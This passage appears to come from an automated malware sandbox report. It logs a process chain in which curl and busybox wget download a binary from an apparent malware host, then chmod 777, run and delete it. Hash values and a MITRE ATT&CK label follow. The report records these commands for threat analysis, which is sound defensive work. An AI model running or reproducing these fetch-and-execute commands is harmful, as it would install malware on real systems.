| 1006 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | RRSI, SNCD, WFT |
| 1008 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | SNCD |
| 1009 | 2 | /bin/chmod | chmod 777 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | FDPM |
| 1010 | 2 | /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | ./xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | EDE |
| 1011 | 2 | /bin/rm | rm xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | |
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97